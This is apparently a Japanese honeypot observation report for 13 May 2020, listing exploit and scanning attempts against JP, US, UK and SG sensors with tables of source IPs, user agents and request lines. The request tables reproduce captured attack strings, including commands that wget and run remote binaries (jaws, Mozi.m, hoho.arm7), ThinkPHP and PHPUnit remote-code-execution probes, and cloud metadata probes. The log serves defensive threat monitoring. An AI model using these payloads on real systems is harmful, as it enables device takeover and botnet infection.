ハニーポット(仮) 観測記録 2020/05/13分です。
特徴
Location:JP
DrayTek製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
クラウド環境のメタデータ情報を狙うアクセス
AWS Security Scannerによるスキャン行為
polaris botnetによるスキャン行為
XTCによるスキャン行為
zgrabによるスキャン行為
Apache Solrへのスキャン行為
Apache Tomcatへのスキャン行為
phpMyAdminへのスキャン行為
18[.]179[.]20[.]5に関する不正通信
UserAgentがHello, Worldであるアクセス
を確認しました。
Location:US
DrayTek製品の脆弱性を狙うアクセス
GPONルータの脆弱性(CVE-2018-10561)を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
XTCによるスキャン行為
XTC BOTNETによるスキャン行為
zgrabによるスキャン行為
Apache Solrへのスキャン行為
UserAgentがHello, Worldであるアクセス
を確認しました。
Location:UK
DrayTek製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
NetGear製品の脆弱性を狙うアクセス
Linear eMerge E3製品の脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
polaris botnetによるスキャン行為
XTC BOTNETによるスキャン行為
zgrabによるスキャン行為
Apache Tomcatへのスキャン行為
phpMyAdminへのスキャン行為
を確認しました。
/shellに対する以下のアクセスを確認しました。
cd /tmp; rm -rf *; wget 172.245.52.231/jaws; sh /tmp/jaws
Location:SG
DrayTek製品の脆弱性を狙うアクセス
GPONルータの脆弱性を狙うアクセス
PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
polaris botnetによるスキャン行為
XTCによるスキャン行為
zgrabによるスキャン行為
Apache Solrへのスキャン行為
phpMyAdminへのスキャン行為
UserAgentがHello, Worldであるアクセス
を確認しました。
他
アクセス数推移
JP:総アクセス数:81 (前日比:-17)
US:総アクセス数:41 (前日比:-112)
UK:総アクセス数:49 (前日比:-7)
SG:総アクセス数:24 (前日比:+1)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Location:JP
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 37.49.226.207 | Netherlands |
| 17 | 44.224.22.196 | United States |
| 17 | 44.225.84.206 | United States |
| 2 | 45.125.46.107 | China |
| 1 | 51.77.94.226 | France |
| 1 | 51.89.213.82 | France |
| 1 | 67.204.43.141 | United States |
| 10 | 80.82.78.104 | Netherlands |
| 1 | 89.144.12.17 | Germany |
| 1 | 91.234.62.17 | Russia |
| 1 | 114.34.74.95 | Taiwan |
| 2 | 150.109.182.140 | Singapore |
| 1 | 162.243.139.53 | United States |
| 1 | 162.243.141.142 | United States |
| 1 | 178.54.86.119 | Ukraine |
| 1 | 182.127.102.255 | China |
| 1 | 193.70.13.35 | France |
| 18 | 195.54.160.121 | Russia |
| 1 | 199.249.230.116 | United States |
| 2 | 210.56.63.219 | Hong Kong |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 23 | - |
| 14 | AWS Security Scanner |
| 1 | Hello, World |
| 1 | Mozilla/5.0 |
| 18 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 |
| 4 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0 |
| 1 | Mozilla/5.0 (X11; CrOS i686 4319.74.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.57 Safari/537.36 |
| 2 | Mozilla/5.0 zgrab/0.x |
| 10 | Python-httplib2/0.17.3 (gzip) |
| 1 | XTC |
| 4 | curl/7.58.0 |
| 1 | polaris botnet |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 12 | \x16\x03\x01 | ||
| 10 | CONNECT | 18[.]179[.]20[.]5:80 | HTTP/1.0 |
| 1 | GET | /.dev/ | HTTP/1.1 |
| 1 | GET | /.dev/.env | HTTP/1.1 |
| 3 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
| 3 | GET | /?a=fetch&content= |
HTTP/1.1 |
| 1 | GET | /HNAP1/ | HTTP/1.1 |
| 1 | GET | /dev/ | HTTP/1.1 |
| 1 | GET | /dev/.env | HTTP/1.1 |
| 1 | GET | /hudson | HTTP/1.1 |
| 2 | GET | /index.php | HTTP/1.1 |
| 3 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP | HTTP/1.1 |
| 4 | GET | /latest/dynamic/instance-identity/document | HTTP/1.1 |
| 1 | GET | /manager/html | HTTP/1.1 |
| 2 | GET | /phpmyadmin/index.php | HTTP/1.1 |
| 1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox&curpath=/¤tsetting.htm=1 | HTTP/1.1 |
| 3 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
| 2 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 2 | GET | http://[::ffff:a9fe:a9fe]/ | HTTP/1.1 |
| 2 | GET | http://[::ffff:a9fe:a9fe]/latest/dynamic/instance-identity/document | HTTP/1.1 |
| 2 | GET | http[:]//169[.]254[.]169[.]254/ | HTTP/1.1 |
| 2 | GET | http[:]//169[.]254[.]169[.]254/latest/dynamic/instance-identity/document | HTTP/1.1 |
| 2 | GET | http[:]//example[.]com/ | HTTP/1.1 |
| 1 | HEAD | / | HTTP/1.0 |
| 1 | HEAD | /lPn3 | HTTP/1.1 |
| 1 | POST | /GponForm/diag_Form?images/ | HTTP/1.1 |
| 2 | POST | /api/jsonws/invoke | HTTP/1.1 |
| 1 | POST | /boaform/admin/formPing | HTTP/1.1 |
| 1 | POST | /cgi-bin/mainfunction.cgi | HTTP/1.1 |
| 6 | POST | /cn/cmd | HTTP/1.1 |
| 4 | POST | /dvr/cmd | HTTP/1.1 |
| 2 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
Location:US
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 5.88.203.130 | Italy |
| 7 | 5.101.0.209 | Russia |
| 10 | 49.232.15.34 | China |
| 1 | 77.235.145.202 | Lebanon |
| 1 | 85.104.118.194 | Turkey |
| 1 | 103.103.88.242 | Bangladesh |
| 1 | 117.157.15.27 | China |
| 1 | 124.118.67.56 | China |
| 1 | 154.70.134.71 | South Africa |
| 1 | 162.243.136.42 | United States |
| 1 | 162.243.144.110 | United States |
| 1 | 162.251.158.233 | Puerto Rico |
| 1 | 172.105.89.161 | United States |
| 12 | 195.54.160.121 | Russia |
| 1 | 202.72.240.12 | Mongolia |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 1 | - |
| 1 | Go-http-client/1.1 |
| 1 | Hello, World |
| 1 | Mozilla/5.0 |
| 19 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36 |
| 10 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
| 2 | Mozilla/5.0 zgrab/0.x |
| 4 | XTC |
| 1 | XTC BOTNET |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | GET | /0bef | HTTP/1.1 |
| 3 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
| 3 | GET | /?a=fetch&content= |
HTTP/1.1 |
| 1 | GET | /TP/html/public/index.php | HTTP/1.1 |
| 1 | GET | /TP/index.php | HTTP/1.1 |
| 2 | GET | /TP/public/index.php | HTTP/1.1 |
| 1 | GET | /adv,/cgi-bin/weblogin.cgi?username=admin%27%3Bls%20%23&password=asdf | HTTP/1.1 |
| 1 | GET | /elrekt.php | HTTP/1.1 |
| 1 | GET | /html/public/index.php | HTTP/1.1 |
| 1 | GET | /hudson | HTTP/1.1 |
| 1 | GET | /index.php | HTTP/1.1 |
| 3 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP | HTTP/1.1 |
| 1 | GET | /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
| 1 | GET | /portal/redlion | HTTP/1.1 |
| 1 | GET | /public/index.php | HTTP/1.1 |
| 3 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
| 1 | GET | /thinkphp/html/public/index.php | HTTP/1.1 |
| 2 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 1 | POST | /GponForm/diag_Form?images/ | HTTP/1.1 |
| 3 | POST | /api/jsonws/invoke | HTTP/1.1 |
| 6 | POST | /cgi-bin/mainfunction.cgi | HTTP/1.1 |
| 1 | POST | /index.php?s=captcha | HTTP/1.1 |
| 2 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
Location:UK
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 6 | 5.101.0.209 | Russia |
| 1 | 24.41.166.50 | United States |
| 2 | 37.6.122.121 | Greece |
| 2 | 45.125.46.107 | China |
| 1 | 79.3.199.89 | Italy |
| 1 | 91.234.62.24 | Russia |
| 1 | 95.213.177.123 | Russia |
| 1 | 95.213.177.124 | Russia |
| 2 | 95.213.177.125 | Russia |
| 1 | 95.213.177.126 | Russia |
| 10 | 113.20.126.226 | Vietnam |
| 1 | 149.202.76.67 | France |
| 2 | 151.14.49.82 | Italy |
| 1 | 154.126.79.223 | Madagascar |
| 1 | 162.243.135.200 | United States |
| 1 | 162.243.141.119 | United States |
| 1 | 182.131.87.138 | China |
| 1 | 185.58.206.227 | Russia |
| 1 | 193.42.99.162 | United States |
| 10 | 195.54.160.121 | Russia |
| 1 | 206.248.172.128 | Canada |
| 1 | 213.128.88.99 | Turkey |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 7 | - |
| 1 | Go-http-client/1.1 |
| 5 | Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0) |
| 1 | Mozilla/5.0 |
| 16 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 2 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0 |
| 2 | Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0 |
| 9 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
| 1 | Mozilla/5.0 (X11; CrOS i686 4319.74.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.57 Safari/537.36 |
| 1 | Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2; WOW64; Trident/6.0) |
| 2 | Mozilla/5.0 zgrab/0.x |
| 1 | XTC BOTNET |
| 1 | polaris botnet |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 3 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
| 3 | GET | /?a=fetch&content= |
HTTP/1.1 |
| 1 | GET | /TP/html/public/index.php | HTTP/1.1 |
| 1 | GET | /TP/index.php | HTTP/1.1 |
| 1 | GET | /TP/public/index.php | HTTP/1.1 |
| 1 | GET | /adv,/cgi-bin/weblogin.cgi?username=admin%27%3Bls%20%23&password=asdf | HTTP/1.1 |
| 1 | GET | /card_scan_decoder.php?No=30&door=%60wget http[:]//switchnets[.]net/hoho.arm7; | |
| 1 | GET | /cgi-bin/test-cgi | HTTP/1.1 |
| 1 | GET | /console | HTTP/1.1 |
| 1 | GET | /elrekt.php | HTTP/1.1 |
| 1 | GET | /html/public/index.php | HTTP/1.1 |
| 1 | GET | /hudson | HTTP/1.1 |
| 2 | GET | /index.php | HTTP/1.1 |
| 3 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP | HTTP/1.1 |
| 1 | GET | /index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1]=1 | HTTP/1.1 |
| 2 | GET | /manager/html | HTTP/1.1 |
| 1 | GET | /phpmyadmin/index.php | HTTP/1.1 |
| 1 | GET | /public/index.php | HTTP/1.1 |
| 1 | GET | /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http[:]//192[.]168[.]1[.]1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 | HTTP/1.0 |
| 2 | GET | /shell?cd+/tmp;rm+-rf+*;wget+ 172.245.52.231/jaws;sh+/tmp/jaws | |
| 3 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
| 1 | GET | /thinkphp/html/public/index.php | HTTP/1.1 |
| 1 | GET | /tmpfs/snap.jpg?usr=user&pwd=user | HTTP/1.1 |
| 1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 1 | HEAD | /lPn3 | HTTP/1.1 |
| 1 | HEAD | /robots.txt | HTTP/1.0 |
| 1 | POST | /HNAP1/ | HTTP/1.0 |
| 3 | POST | /api/jsonws/invoke | HTTP/1.1 |
| 1 | POST | /boaform/admin/formPing | HTTP/1.1 |
| 1 | POST | /cgi-bin/mainfunction.cgi | HTTP/1.1 |
| 1 | POST | /index.php?s=captcha | HTTP/1.1 |
| 1 | POST | http[:]//check[.]proxyradar[.]com/azenv.php?auth=158923576221&a=PSCMN&i=2224112162&p=80 | HTTP/1.1 |
| 1 | POST | http[:]//check[.]proxyradar[.]com/azenv.php?auth=158925196629&a=PSCMN&i=2224112162&p=80 | HTTP/1.1 |
| 1 | POST | http[:]//check[.]proxyradar[.]com/azenv.php?auth=158926849955&a=PSCMN&i=2224112162&p=80 | HTTP/1.1 |
| 1 | POST | http[:]//check[.]proxyradar[.]com/azenv.php?auth=158928490737&a=PSCMN&i=2224112162&p=80 | HTTP/1.1 |
| 1 | POST | http[:]//check[.]proxyradar[.]com/azenv.php?auth=158930104561&a=PSCMN&i=2224112162&p=80 | HTTP/1.1 |
Location:SG
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 7 | 5.101.0.209 | Russia |
| 1 | 5.188.206.50 | Russia |
| 4 | 49.248.127.175 | India |
| 1 | 96.56.160.50 | United States |
| 1 | 117.86.24.209 | China |
| 4 | 123.252.216.194 | India |
| 1 | 143.255.198.242 | Brazil |
| 1 | 158.69.172.228 | Canada |
| 1 | 162.243.135.201 | United States |
| 1 | 183.91.4.97 | Vietnam |
| 1 | 186.71.31.234 | Ecuador |
| 1 | 201.171.44.64 | Mexico |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 1 | - |
| 1 | Hello, World |
| 7 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36 |
| 8 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0 |
| 1 | Mozilla/5.0 (X11; CrOS i686 4319.74.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.57 Safari/537.36 |
| 1 | Mozilla/5.0 zgrab/0.x |
| 4 | XTC |
| 1 | polaris botnet |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | \x03 | ||
| 1 | GET | /?XDEBUG_SESSION_START=phpstorm | HTTP/1.1 |
| 1 | GET | /?a=fetch&content= |
HTTP/1.1 |
| 1 | GET | /cgi-bin/test-cgi | HTTP/1.1 |
| 1 | GET | /console | HTTP/1.1 |
| 1 | GET | /horde/imp/test.php | HTTP/1.1 |
| 1 | GET | /hudson | HTTP/1.1 |
| 1 | GET | /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1]=HelloThinkPHP | HTTP/1.1 |
| 1 | GET | /login.action | HTTP/1.1 |
| 1 | GET | /login/do_login | HTTP/1.1 |
| 1 | GET | /login?from=0.000000 | HTTP/1.1 |
| 1 | GET | /phpMyAdmin/scripts/setup.php | HTTP/1.1 |
| 1 | GET | /phpmyadmin/scripts/setup.php | HTTP/1.1 |
| 1 | GET | /solr/admin/info/system?wt=json | HTTP/1.1 |
| 1 | GET | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
| 1 | HEAD | /lPn3 | HTTP/1.1 |
| 1 | POST | /GponForm/diag_Form?images/ | HTTP/1.1 |
| 1 | POST | /api/jsonws/invoke | HTTP/1.1 |
| 1 | POST | /boaform/admin/formPing | HTTP/1.1 |
| 4 | POST | /cgi-bin/mainfunction.cgi | HTTP/1.1 |
| 1 | POST | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php | HTTP/1.1 |
